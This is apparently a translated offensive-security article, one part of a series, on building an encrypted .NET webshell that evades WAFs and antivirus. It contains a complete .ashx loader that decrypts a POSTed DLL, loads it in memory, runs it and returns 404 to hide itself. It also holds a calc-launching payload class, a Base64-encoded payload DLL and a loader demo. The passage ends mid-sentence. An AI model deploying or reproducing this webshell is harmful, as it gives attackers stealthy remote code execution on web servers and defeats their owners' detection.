Overview

This series rewrites the one-line webshell (一句话木马) in three versions, Java, .NET and PHP, so that the server side parses and executes an encrypted binary stream sent by the client, and implements a matching client tool. The aim is to get past WAFs and other network-level detection once and for all. As of this writing, all three versions also evade host-based file-signature products such as Safedog (安全狗), D-Shield (D盾) and the usual antivirus engines. I originally meant to cover the three versions in one article, but it grew too long, so it is split into four parts:
A New One-Line Webshell Using Dynamic Binary Encryption: Java Edition
A New One-Line Webshell Using Dynamic Binary Encryption: .NET Edition
A New One-Line Webshell Using Dynamic Binary Encryption: PHP Edition
A New One-Line Webshell Using Dynamic Binary Encryption: Client Download and Features

Preface

In the previous article, A New One-Line Webshell Using Dynamic Binary Encryption: Java Edition, we introduced an approach for bypassing traffic-based protection systems once and for all and completed its Java implementation. The bypass flow is roughly as shown in the figure below:

See the previous article for the details; here we continue with the .NET implementation of the same idea.

Implementation

Server side

The existing aspx one-line webshells that can execute arbitrary code rely on JScript.NET's eval function: JScript.NET source code is passed to eval and executed, with the same effect as eval in classic ASP. The original author of this classic one-liner is kj021320 of the ISTO team.

1. Dynamically loading a binary DLL on the server

In Java every class compiles to its own class file. .NET is different: there is no per-class binary. Instead it introduces the concept of an Assembly, and compiled classes are carried inside an assembly, which is the unit the CLR executes. Under .NET, managed DLLs and EXEs are both assemblies, and one assembly can contain many classes.
The Assembly class provides a Load method:

public static System.Reflection.Assembly Load (byte[] rawAssembly);
Loads the assembly with a common object file format (COFF)-based image containing an emitted assembly. The assembly is loaded into the application domain of the caller.

This overload takes the raw bytes of an assembly file and returns an Assembly object. Two properties of it matter in practice: the assembly goes into the caller's AppDomain and, on .NET Framework, cannot be unloaded again, so every payload loaded this way stays resident in the worker process; and an assembly loaded from a byte array has an empty Location property, which is one of the things a responder can look for when enumerating AppDomain.CurrentDomain.GetAssemblies() inside a suspect w3wp.exe. With the Assembly object in hand, we call its CreateInstance method to instantiate a class from the DLL; its prototype is:

public object CreateInstance (string typeName);

So all we need to do is write our payload in C#, compile it into a DLL, and pass the DLL's bytes to Load: that dynamically loads and executes our precompiled binary class.
Let's write a demo to test this:
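As an added example (not code from the article or from its author's tool), here are the same two calls hosted where the series intends them to run: an .ashx handler that takes the encrypted DLL as the POST body, decrypts it, loads it with Assembly.Load(byte[]) and invokes the payload through Object.Equals, the hook the article's payload classes override. The wire format (a 16-byte IV followed by AES-128-CBC/PKCS7 ciphertext), the fixed pre-shared key, the handler name Loader and the payload class name Payload are all assumptions of this example; the key exchange used by the series is not reproduced here.

```csharp
<%@ WebHandler Language="C#" Class="Loader" %>
// Added example (not the article's code): Loader.ashx decrypts the POST body,
// loads the result as an assembly and invokes the payload through Object.Equals.
using System;
using System.Reflection;
using System.Security.Cryptography;
using System.Text;
using System.Web;

public class Loader : IHttpHandler
{
    // Assumed pre-shared AES-128 key (hypothetical value; how the client learns it is out of scope here).
    private static readonly byte[] Key = Encoding.ASCII.GetBytes("0123456789abcdef");

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        // Minimum is one IV block plus one ciphertext block; anything else is answered like a missing page.
        if (ctx.Request.HttpMethod != "POST" || ctx.Request.ContentLength < 32)
        {
            NotFound(ctx);
            return;
        }
        byte[] body = ctx.Request.BinaryRead(ctx.Request.ContentLength);

        byte[] image;
        try
        {
            image = Decrypt(body, Key);   // wrong key or tampered body fails the PKCS7 check and throws
        }
        catch (CryptographicException)
        {
            NotFound(ctx);
            return;
        }

        // The two calls from the article's demo, fed by the decrypted stream instead of a Base64 constant.
        Assembly asm;
        try
        {
            asm = Assembly.Load(image);   // image must be a complete PE/COFF assembly, exactly what csc emits
        }
        catch (BadImageFormatException)
        {
            NotFound(ctx);
            return;
        }
        object payload = asm.CreateInstance("Payload");   // class name is an assumption shared with the client
        if (payload == null)
        {
            NotFound(ctx);
            return;
        }

        // Object.Equals is the entry point, so loader and payload share no type; passing the
        // HttpContext gives the payload access to Request and Response.
        payload.Equals(ctx);
    }

    // Assumed wire format: 16-byte IV followed by AES-128-CBC/PKCS7 ciphertext of the DLL.
    private static byte[] Decrypt(byte[] blob, byte[] key)
    {
        if (blob.Length < 32 || blob.Length % 16 != 0)
            throw new CryptographicException("length is not IV plus whole AES blocks");
        byte[] iv = new byte[16];
        Buffer.BlockCopy(blob, 0, iv, 0, 16);
        using (Aes aes = Aes.Create())
        {
            aes.Key = key;
            aes.IV = iv;
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            using (ICryptoTransform dec = aes.CreateDecryptor())
            {
                return dec.TransformFinalBlock(blob, 16, blob.Length - 16);
            }
        }
    }

    private static void NotFound(HttpContext ctx)
    {
        ctx.Response.StatusCode = 404;
    }
}
```

A payload built for this loader casts obj to HttpContext inside its Equals override and writes its result through that context's Response, so the handler itself contains no command-execution code and nothing a signature can match beyond the reflection and crypto calls. Because Assembly.Load(byte[]) leaves every loaded assembly resident, repeated requests grow the worker process, and those Location-less assemblies remain visible to anyone inspecting the w3wp.exe process after the request has finished.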

Payload.cs
using System;
using System.Diagnostics;

// Compiled on its own into Payload.dll (e.g. csc /target:library Payload.cs); it references nothing from the loader.
public class Payload
{
    // Entry point invoked by the loader: every object already has Equals, so no shared interface is needed.
    public override bool Equals(Object obj)
    {
        Process.Start("calc.exe");   // proof of execution: pop calc
        return true;
    }
}

The payload is trivial: it launches the calculator. We override the Equals method inherited from Object (for the reasoning behind choosing Equals, see the previous article, the Java edition; in short, every object already has Equals, so the loader can call into the payload without sharing an interface or looking a method up by name).
Compile the class into a DLL, Base64-encode the file, and then write the following demo:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

namespace ConsoleApplication1
{
    class Program
    {
        public static void Main()
        {
            // Base64 of Payload.dll. A verbatim (@"...") literal keeps the line breaks legal; Convert.FromBase64String ignores them.
            string Payload=@"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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAAgDMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
            // Load the PE image straight from memory, instantiate the class by name, and call the Equals entry point.
            Assembly myAssembly = Assembly.Load(Convert.FromBase64String(Payload));
            Object myPayload = myAssembly.CreateInstance("Payload");
            myPayload.Equals("");
        }
    }
}

A brief explanation of the code:
